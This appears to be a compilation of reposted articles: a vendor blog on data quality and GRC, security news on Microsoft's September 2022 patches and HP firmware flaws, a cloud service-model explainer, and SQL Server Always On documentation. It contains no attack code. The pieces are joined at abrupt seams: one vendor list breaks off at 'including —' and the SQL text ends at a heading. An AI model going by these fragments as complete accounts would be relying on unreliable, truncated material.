How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliably information serves an organization's specific needs — mainly supporting decision-making.

Some of these needs might be:

  • Operations – Where and how can we be more efficient?
  • Resource distribution – Do we have any excess? Where? And why?
  • Planning – How likely is this scenario to occur? What can we do about it?
  • Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

  • Consistency
  • Accuracy
  • Validity
  • Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations to achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

  • Completeness: The expected data to make decisions is present.
  • Uniqueness: There is no duplication of data.
  • Timeliness: The data is up-to-date and available to use when needed.
  • Validity: The information has the proper format and matches the requirements.
  • Accuracy: The data describes the object correctly in a real-world context.
  • Consistency: The data is the same across multiple databases.
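To show how such characteristics can be checked mechanically, here is a minimal sketch of an automated audit for completeness, uniqueness, and validity; the field names and the email rule are illustrative assumptions, not a feature of any particular GRC product.

import re

REQUIRED_FIELDS = ("id", "email", "country")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def audit(records):
    issues, seen_ids = [], set()
    for i, rec in enumerate(records):
        missing = [f for f in REQUIRED_FIELDS if not rec.get(f)]
        if missing:  # completeness
            issues.append((i, f"incomplete: missing {missing}"))
        if rec.get("id") in seen_ids:  # uniqueness
            issues.append((i, "not unique: duplicate id"))
        seen_ids.add(rec.get("id"))
        if rec.get("email") and not EMAIL_RE.match(rec["email"]):  # validity
            issues.append((i, "invalid: malformed email"))
    return issues

print(audit([
    {"id": "1", "email": "a@b.co", "country": "CA"},
    {"id": "1", "email": "bad-email", "country": ""},
]))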

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls to avoid mistakes, standardize tasks and guide personnel when collecting and dealing with vital information.

GRC helps organizations answer the following questions:

  • How is the company ensuring that data is available for internal decision-making and for clients?
  • Is everyone taking the proper steps to collect and process data?
  • Have redundancies been removed?
  • Is the organization prepared for unexpected events?
  • Does the organization have a backup system?
  • Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enables organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization processes has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can't get value from it, and they face the following risks:

  • Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
  • Lost revenue: According to Gartner's 2021 research, the average financial impact of poor data quality on organizations is $12.9 million annually.
  • Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
  • Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
  • Increased expenses: A few years ago, IBM's research showed that poor-quality data cost businesses $3.1 trillion in the US alone. How? Time spent finding the correct data, fixing errors, and hunting for information and confirmed sources.
  • Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
  • Reputational damage: In today's world, customers spend a lot of time reading reviews before making a decision. If a company fails to satisfy its customers, everyone will know.
  • Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are less obvious. Trusted data not only improves efficiency and results; it also helps with fundamental factors that affect business performance and success.

What are these factors?

Fundamental benefits:

  • Profits/Revenue
  • Internal communication
  • Employees' confidence to share information
  • Company’s reputation
  • Trust

Operational benefits:

  • Efficiency
  • Business outcome
  • Fewer privacy issues
  • Customer satisfaction
  • Better audience-targeting

How GRC protects the value of businesses and their data

In this contemporary world, companies should be measured not only via existing financial measurements but also by the amount of monetizable data they can capture, consume, store and use. More importantly, how the data helps the organization’s internal processes to be faster and more agile.

When people think of high-quality data and big data, they usually associate the two with big organizations, especially technology and social media platforms. However, high-quality big data gives organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

  • Understand their clients
  • Enhance business operations
  • Understand industry best practices
  • Identify the best partnership options
  • Strengthen business culture
  • Deliver better results
  • Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sales cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal), and, as such, organizations must protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

  • Fines
  • Lawsuits
  • Stolen information
  • Compensations
  • Potential business loss

Indirect costs are:

  • Reputation/Trust
  • PR activities
  • Lost revenue from downtime
  • New and better protection

Often, reputational damage causes long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is companies' biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can't get or maintain customers because of a lack of trust, the organization's value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium-sized companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harvard Business Review reported that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

  • Human errors
  • Wrong data handling
  • Inaccurate formatting
  • Different sets of data for various departments
  • Unawareness of risks
  • Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company's information. As a result, GRC will empower companies to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allow organizations to understand the risks associated with data handling and guide managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

  • Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
  • Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
  • Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
  • Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
  • One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source:
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Microsoft’s Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

“In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months,” Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

“However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total.”

The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

“An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system,” Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It’s not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows –

  • CVE-2022-34718 (CVSS score: 9.8) – Windows TCP/IP Remote Code Execution Vulnerability
  • CVE-2022-34721 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34722 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34700 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
  • CVE-2022-35805 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

“An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation,” Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server, as well as five privilege escalation bugs spanning Windows Kerberos and the Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.

Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

“This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening,” Jogi said. “If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information.”

Software Patches from Other Vendors

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

High-Severity Firmware Security Flaws Left Unpatched in HP Enterprise Devices

A number of firmware security flaws uncovered in HP’s business-oriented high-end notebooks continue to be left unpatched in some devices even months after public disclosure.

Binarly, which first revealed details of the issues at the Black Hat USA conference in mid-August 2022, said the vulnerabilities “can’t be detected by firmware integrity monitoring systems due to limitations of the Trusted Platform Module (TPM) measurement.”

Firmware flaws can have serious implications as they can be abused by an adversary to achieve long-term persistence on a device in a manner that can survive reboots and evade traditional operating system-level security protections.

The high-severity weaknesses identified by Binarly affect HP EliteBook devices and concern a case of memory corruption in the System Management Mode (SMM) of the firmware, thereby enabling the execution of arbitrary code with the highest privileges –

  • CVE-2022-23930 (CVSS score: 8.2) – Stack-based buffer overflow
  • CVE-2022-31640 (CVSS score: 7.5) – Improper input validation
  • CVE-2022-31641 (CVSS score: 7.5) – Improper input validation
  • CVE-2022-31644 (CVSS score: 7.5) – Out-of-bounds write
  • CVE-2022-31645 (CVSS score: 8.2) – Out-of-bounds write
  • CVE-2022-31646 (CVSS score: 8.2) – Out-of-bounds write

Three of the bugs (CVE-2022-23930, CVE-2022-31640, and CVE-2022-31641) were reported to HP in July 2021, with the remaining three vulnerabilities (CVE-2022-31644, CVE-2022-31645, and CVE-2022-31646) reported in April 2022.

It’s worth noting that CVE-2022-23930 is also one of the 16 security flaws that were previously flagged this February as impacting several enterprise models from HP.

SMM, also called “Ring -2,” is a special-purpose mode used by the firmware (i.e., UEFI) for handling system-wide functions such as power management, hardware interrupts, or other proprietary original equipment manufacturer (OEM) designed code.

Shortcomings identified in the SMM component can, therefore, act as a lucrative attack vector for threat actors to perform nefarious activities with higher privileges than those of the operating system.

Although HP has released mitigations to address the flaws in March and August, the vendor has yet to push the patches for all impacted models, potentially exposing customers to the risk of cyberattacks.

“In many cases, firmware is a single point of failure between all the layers of the supply chain and the endpoint customer device,” Binarly said, adding, “fixing vulnerabilities for a single vendor is not enough.”

“As a result of the complexity of the firmware supply chain, there are gaps that are difficult to close on the manufacturing end since it involves issues beyond the control of the device vendors.”

The disclosure also arrives as the PC maker last week rolled out fixes for a privilege escalation flaw (CVE-2022-38395, CVSS score: 8.2) in its Support Assistant troubleshooting software.

“It is possible for an attacker to exploit the DLL hijacking vulnerability and elevate privileges when Fusion launches the HP Performance Tune-up,” the company noted in an advisory.

Source :
https://thehackernews.com/2022/09/high-severity-firmware-security-flaws.html

SaaS vs PaaS vs IaaS: What’s the Difference & How to Choose

Companies are increasingly using Cloud services to support their business processes. But which types of Cloud services are there, and what are the differences? Which kind of Cloud service is most suitable for you? Do you want to be unburdened or completely in control? Do you opt for maximum cost savings, or do you want the full arsenal of possibilities and top performance? Can you still see the forest for the trees? In this article and the next, I describe several different Cloud services, what their differences and features are, and what exactly you need to pay attention to.

Let’s start with the definition of Cloud computing. This is the provision of services using the internet (Cloud): think of storage, software, servers, databases, etc. Depending on the type of service offered (think of license management or data storage), you can divide these services into categories, such as IaaS (Infrastructure as a Service), PaaS (Platform as a Service), and SaaS (Software as a Service). These services are provided by a cloud provider. Whether this is Microsoft (Azure), Amazon (AWS), or another vendor (Google, Alibaba, Oracle, etc.), each vendor offers Cloud services that fall under one of the categories we are about to discuss.

One feature of Cloud computing is that you pay according to the usage and the service you purchase. For example, for SaaS, you pay for the software’s license and support. This also means that if you buy a SaaS service (e.g., Office 365) and don’t use it, you will still be charged. At the same time, if you purchase storage with IaaS, for example, you only pay for the amount of storage you use, possibly supplemented with additional services such as backup, etc.
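To make that pay-per-use distinction concrete, here is a minimal sketch in Python. All prices and quantities are invented for illustration and do not reflect any vendor’s actual rates:

```python
# Hypothetical cost comparison: flat SaaS licensing vs. pay-per-use IaaS
# storage. All prices are invented for illustration; real pricing varies
# per vendor, region, and contract.

SAAS_LICENSE_PER_USER = 10.00  # fixed monthly fee per purchased license
IAAS_STORAGE_PER_GB = 0.02     # monthly fee per GB actually consumed

def saas_monthly_cost(licenses_purchased: int) -> float:
    # SaaS: every purchased license is billed, whether it is used or not.
    return licenses_purchased * SAAS_LICENSE_PER_USER

def iaas_storage_monthly_cost(gb_used: float) -> float:
    # IaaS storage: you pay only for the capacity you consume.
    return gb_used * IAAS_STORAGE_PER_GB

# 50 licenses bought but only 35 in active use: the idle 15 are still billed.
print(saas_monthly_cost(50))            # 500.0
# 1,200 GB of storage actually consumed this month.
print(iaas_storage_monthly_cost(1200))  # 24.0
```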

Sometimes Cloud services complement each other; think, for example, of DBaaS (Database as a Service), where a database is offered via the Cloud. Often you need an application server and other infrastructure to read data from this database. These usually run in a Landing Zone, purchased as an IaaS service. But some services can also stand alone, for example, SaaS (Office 365).

Each Cloud service has specific characteristics. Sometimes it requires little or no (technical) knowledge, but it can also be challenging to manage and use the services according to best practices. This often depends on the degree to which you want to be in control. If you want an application from the Cloud where you are completely relieved of all worries, this requires little technical knowledge from the user or the administrator. But if you want maximum control, then IaaS gives you an enormous range of possibilities. In this article, you can read what you need to consider.

It is advisable to think beforehand about what exactly your requirements and wishes are and whether this fits the service you want to purchase. If you wish to use an application in the Cloud but rely on many custom settings, this is often not possible. If you don’t want to be responsible for updating and backing up an application and use little or no customization, a SaaS can be very interesting. Also, look at how a service fits into your business process. Does it offer possibilities for automation, reporting, or disaster recovery? Are there possibilities to temporarily allocate extra resources in case of peak demand (horizontal or vertical scaling), and what guarantees does the supplier offer with this service? Think of RPO/RTO and accessibility of the service desk in case of a calamity.

Let’s get started quickly!

IaaS (Infrastructure as a Service)

One of the best-known Cloud services is undoubtedly IaaS. For many companies, this is often their first introduction to a Cloud service. You rent the infrastructure from a cloud provider: for example, the network infrastructure, virtual servers (including the operating system), and storage. A feature of IaaS is that you have complete control, both on the management side and in how you deploy resources. This can be done in various automated ways (PowerShell, IaC, DevOps pipelines, etc.) as well as via the classic management interface that all providers offer. Things that are often not possible with a PaaS service are possible with an IaaS service. In principle, you can set up a complete server environment (all services are available for this), while still enjoying the benefits of the Cloud, such as scalability and paying per use or per resource.
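As a small illustration of the automated routes just mentioned, the sketch below drives the Azure CLI from Python. It assumes the az CLI is installed and already authenticated, and every name, region, image alias, and size is a hypothetical example; PowerShell or an IaC tool such as Terraform or Bicep would be equally valid choices:

```python
# Minimal sketch: provisioning IaaS resources by scripting the Azure CLI.
# Assumes the "az" CLI is installed and already authenticated (az login).
# The resource group, VM name, region, image alias, and size are all
# hypothetical examples; PowerShell, Terraform, or Bicep work just as well.
import subprocess

def az(*args: str) -> None:
    # Run one Azure CLI command and raise if it fails.
    subprocess.run(["az", *args], check=True)

az("group", "create", "--name", "rg-demo", "--location", "westeurope")
az("vm", "create",
   "--resource-group", "rg-demo",
   "--name", "vm-demo-01",
   "--image", "Ubuntu2204",
   "--size", "Standard_B2s",
   "--admin-username", "azureuser",
   "--generate-ssh-keys")
```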

IaaS, therefore, most resembles an on-premises implementation, and you often see it used in combination with virtual servers. Critical here is a good investigation into possible limitations, for example I/O, because performance in practice can differ from a traditional local environment. You are responsible for arranging security and backup. The advantage is that you influence the choice of technology used: you can customize the setup according to your needs and wishes and standardize the configuration for your organization. Deployment can be complex, and you are forced to make your own choices, so some expertise is needed.

PaaS (Platform as a Service)

PaaS stands for Platform as a Service and goes further than IaaS. You get a platform on which you can do the configuration yourself. When you use a PaaS service, the vendor takes care of the underlying layer (IaaS), the operating system, and the middleware, so you sacrifice some control and capabilities. PaaS services are ideal for developers and web and application builders, because you can quickly make an environment available. Using PaaS means you no longer have to worry about the infrastructure, operating system, and middleware; the supplier takes care of these based on best practices. This also offers security advantages, as patching and upgrading these layers is now done by the vendor.

Another advantage is that you can entirely focus on what you want to do and not on managing the environment. You can also easily purchase additional services and quickly scale them up or down. When you are finished, you can remove and stop the resources, so you have no more costs.
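For instance, temporarily scaling a PaaS resource up and back down can be a single command per direction. A hedged sketch against a hypothetical Azure App Service plan (the plan name, resource group, and SKUs are examples only):

```python
# Hedged sketch: vertically scaling a hypothetical Azure App Service plan up
# for a peak and back down afterwards. Assumes the "az" CLI is installed and
# authenticated; the plan name, resource group, and SKUs are examples only.
import subprocess

def set_plan_sku(plan: str, resource_group: str, sku: str) -> None:
    # Changing the plan's SKU scales every app hosted on that plan.
    subprocess.run(
        ["az", "appservice", "plan", "update",
         "--name", plan, "--resource-group", resource_group, "--sku", sku],
        check=True,
    )

set_plan_sku("plan-demo", "rg-demo", "P1V2")  # scale up before the peak
# ... peak period ...
set_plan_sku("plan-demo", "rg-demo", "B1")    # scale back down afterwards
```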

However, do take into account the use of existing software. Not all existing software is suitable to run in a PaaS environment; for example, in a PaaS environment you do not have full access (after all, the vendor is responsible). Also, not all CPU power and memory are allocated to your Cloud application, because it is often hosted on a shared platform, so other applications (and databases) may use the same resources. As for the database, you have the same advantages and disadvantages as with DBaaS.

SaaS (Software as a Service)

This is probably a service you’ve been using for a while. In short, you consume applications through the Cloud on a subscription basis. The provider is responsible for managing the infrastructure, patches, and updates. A SaaS solution is ready for use immediately, and you directly benefit from the added value, such as fast scaling up and down and paying per use. Examples are Office 365, SharePoint Online, Salesforce, Exact Online, Dropbox, etc.

Unlike IaaS and PaaS, where there is still a lot of freedom and you have to set everything up yourself, with SaaS it is immediately clear what you are buying and what you will get. With this service, you are relieved of most of your worries: the vendor is responsible for all updates, patches, development, and more. You cannot make any updates or changes to the software yourself.

Many companies use one or more SaaS services, and often there is even a distinction within a company: each department has its specific applications and associated SaaS services. With this service, you only pay for what you need, including the licenses, and these licenses can easily be scaled up or down.

It is interesting for many companies to work with SaaS solutions. It is particularly interesting for start-ups, small companies, and freelancers because you only purchase what you use, you don’t have unnecessarily high start-up costs, and you don’t have to worry about the maintenance of the software.

But SaaS can also be a perfect solution for larger companies. For example, if you hire extra staff for specific periods, you can quickly get these people working with the software they need: you buy several additional licenses and stop them when the temporary staff leaves.

How can Vembu help you?

BDRSuite is a comprehensive Backup & DR solution designed to protect your business-critical data across Virtual (VMware, Hyper-V), Physical Servers (Windows, Linux), SaaS (Microsoft 365, Google Workspace), AWS EC2 Instances, Endpoints (Windows, Mac) and Applications & Databases (MS Active Directory, MS Exchange, MS Outlook, SharePoint, MS SQL, MySQL).

To protect your workloads running on SaaS (Microsoft 365, Google Workspace), try out a full-featured 30-day free trial of the latest version of BDRSuite.

Source :
https://www.vembu.com/blog/saas-vs-paas-vs-iaas-whats-the-difference-how-to-choose/

Differences between availability modes for an Always On availability group

Applies to:  SQL Server (all supported versions)

In Always On availability groups, the availability mode is a replica property that determines whether a given availability replica can run in synchronous-commit mode. For each availability replica, the availability mode must be configured for either synchronous-commit mode, asynchronous-commit mode, or configuration only mode. If the primary replica is configured for asynchronous-commit mode, it does not wait for any secondary replica to write incoming transaction log records to disk (to harden the log). If a given secondary replica is configured for asynchronous-commit mode, the primary replica does not wait for that secondary replica to harden the log. If the primary replica and a given secondary replica are both configured for synchronous-commit mode, the primary replica waits for the secondary replica to confirm that it has hardened the log (unless the secondary replica fails to ping the primary replica within the primary’s session-timeout period).

 Note

If the primary’s session-timeout period is exceeded by a secondary replica, the primary replica temporarily shifts into asynchronous-commit mode for that secondary replica. When the secondary replica reconnects with the primary replica, they resume synchronous-commit mode.

Supported Availability Modes

Always On availability groups supports three availability modes: asynchronous-commit mode, synchronous-commit mode, and configuration only mode, as follows:

  • Asynchronous-commit mode is a disaster-recovery solution that works well when the availability replicas are distributed over considerable distances. If every secondary replica is running under asynchronous-commit mode, the primary replica does not wait for any of the secondary replicas to harden the log. Rather, immediately after writing the log record to the local log file, the primary replica sends the transaction confirmation to the client. The primary replica runs with minimum transaction latency in relation to a secondary replica that is configured for asynchronous-commit mode. If the current primary is configured for asynchronous-commit availability mode, it will commit transactions asynchronously for all secondary replicas regardless of their individual availability mode settings. For more information, see Asynchronous-Commit Availability Mode, later in this topic.
  • Synchronous-commit mode emphasizes high availability over performance, at the cost of increased transaction latency. Under synchronous-commit mode, transactions wait to send the transaction confirmation to the client until the secondary replica has hardened the log to disk. When data synchronization begins on a secondary database, the secondary replica begins applying incoming log records from the corresponding primary database. As soon as every log record has been hardened, the secondary database enters the SYNCHRONIZED state. Thereafter, every new transaction is hardened by the secondary replica before the log record is written to the local log file. When all the secondary databases of a given secondary replica are synchronized, synchronous-commit mode supports manual failover and, optionally, automatic failover. For more information, see Synchronous-Commit Availability Mode, later in this topic.
  • Configuration only mode applies to availability groups that are not on a Windows Server Failover Cluster. A replica in configuration only mode does not contain user data; its master database stores the availability group configuration metadata. For more information, see Availability group with configuration only replica. (A brief configuration sketch follows this list.)
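As a brief sketch of how a replica’s availability mode is assigned, the following Python snippet sends the corresponding T-SQL via pyodbc. The availability group, replica, and server names are hypothetical, and the same statement can be run directly in SQL Server Management Studio:

```python
# Minimal sketch (hypothetical names): assigning an availability mode to a
# replica with T-SQL, executed here via pyodbc against the current primary.
# Other valid modes are ASYNCHRONOUS_COMMIT and CONFIGURATION_ONLY.
import pyodbc

TSQL = """
ALTER AVAILABILITY GROUP [AG_Demo]
MODIFY REPLICA ON N'SQLNODE02'
WITH (AVAILABILITY_MODE = SYNCHRONOUS_COMMIT);
"""

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=SQLNODE01;DATABASE=master;Trusted_Connection=yes;",
    autocommit=True,  # availability group DDL should not run in a user transaction
)
conn.cursor().execute(TSQL)
conn.close()
```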

The following illustration shows an availability group with five availability replicas. The primary replica and one secondary replica are configured for synchronous-commit mode with automatic failover. Another secondary replica is configured for synchronous-commit mode with only planned manual failover, and two secondary replicas are configured for asynchronous-commit mode, which supports only forced manual failover (typically called forced failover).

[Illustration: Availability and failover modes of replicas]

The synchronization and failover behavior between two availability replicas depends on the availability mode of both replicas. For example, for synchronous commit to occur, both the current primary replica and the secondary replica in question must be configured for synchronous commit. Likewise, for automatic failover to occur, both replicas need to be configured for automatic failover. Therefore, the behavior for the illustrated deployment scenario above can be summarized in the following table, which explores the behavior with each potential primary replica:

Current Primary Replica | Automatic Failover Targets | Synchronous-Commit Mode Behavior With | Asynchronous-Commit Mode Behavior With | Automatic Failover Possible
01 | 02 | 02 and 03 | 04 | Yes
02 | 01 | 01 and 03 | 04 | Yes
03 | (none) | 01 and 02 | 04 | No
04 | (none) | (none) | 01, 02, and 03 | No

Typically, Node 04, as an asynchronous-commit replica, is deployed in a disaster recovery site. The fact that Nodes 01, 02, and 03 remain in asynchronous-commit mode after failing over to Node 04 helps prevent potential performance degradation in your availability group due to high network latency between the two sites.
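The table’s last column can be reproduced with a small toy check: automatic failover between two replicas requires both to be synchronous-commit with automatic failover mode (synchronization and WSFC quorum are assumed for simplicity here):

```python
# Toy check of the table above. Automatic failover between two replicas needs
# BOTH to be synchronous-commit with automatic failover mode; synchronization
# and WSFC quorum are assumed for simplicity.
REPLICAS = {
    # name: (availability_mode, failover_mode) for the illustrated deployment
    "01": ("sync", "automatic"),
    "02": ("sync", "automatic"),
    "03": ("sync", "manual"),
    "04": ("async", "manual"),
}

def automatic_failover_possible(primary: str) -> bool:
    mode, failover = REPLICAS[primary]
    if mode != "sync" or failover != "automatic":
        return False
    # At least one OTHER replica must also be a sync/automatic partner.
    return any(
        m == "sync" and f == "automatic"
        for name, (m, f) in REPLICAS.items()
        if name != primary
    )

for node in REPLICAS:
    # Matches the table: 01 -> True, 02 -> True, 03 -> False, 04 -> False
    print(node, automatic_failover_possible(node))
```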

Asynchronous-Commit Availability Mode

Under asynchronous-commit mode, the secondary replica never becomes synchronized with the primary replica. Though a given secondary database might catch up to the corresponding primary database, any secondary database could lag behind at any point. Asynchronous-commit mode can be useful in a disaster-recovery scenario in which the primary replica and the secondary replica are separated by a significant distance and where you do not want small errors to impact the primary replica or in situations where performance is more important than synchronized data protection. Furthermore, since the primary replica does not wait for acknowledgements from the secondary replica, problems on the secondary replica never impact the primary replica.

An asynchronous-commit secondary replica attempts to keep up with the log records received from the primary replica. But asynchronous-commit secondary databases always remain unsynchronized and are likely to lag somewhat behind the corresponding primary databases. Typically the gap between an asynchronous-commit secondary database and the corresponding primary database is small. But the gap can become substantial if the server hosting the secondary replica is overloaded or the network is slow.

The only form of failover supported by asynchronous-commit mode is forced failover (with possible data loss). Forcing failover is a last resort intended only for situations in which the current primary replica will remain unavailable for an extended period and immediate availability of primary databases is more critical than the risk of possible data loss. The failover target must be a replica whose role is in the SECONDARY or RESOLVING state. The failover target transitions to the primary role, and its copies of the databases become the primary databases. Any remaining secondary databases, along with the former primary databases, once they become available, are suspended until you manually resume them individually. Under asynchronous-commit mode, any transaction logs that the original primary replica had not yet sent to the former secondary replica are lost. This means that some or all of the new primary databases might be lacking recently committed transactions. For more information on how forced failover works and on best practices for using it, see Failover and Failover Modes (Always On Availability Groups).

Synchronous-Commit Availability Mode

Under synchronous-commit availability mode (synchronous-commit mode), after being joined to an availability group, a secondary database catches up to the corresponding primary database and enters the SYNCHRONIZED state. The secondary database remains SYNCHRONIZED as long as data synchronization continues. This guarantees that every transaction that is committed on a given primary database has also been committed on the corresponding secondary database. When every secondary database on a given secondary replica is synchronized, the synchronization-health state of the secondary replica as a whole is HEALTHY.

Factors That Disrupt Data Synchronization

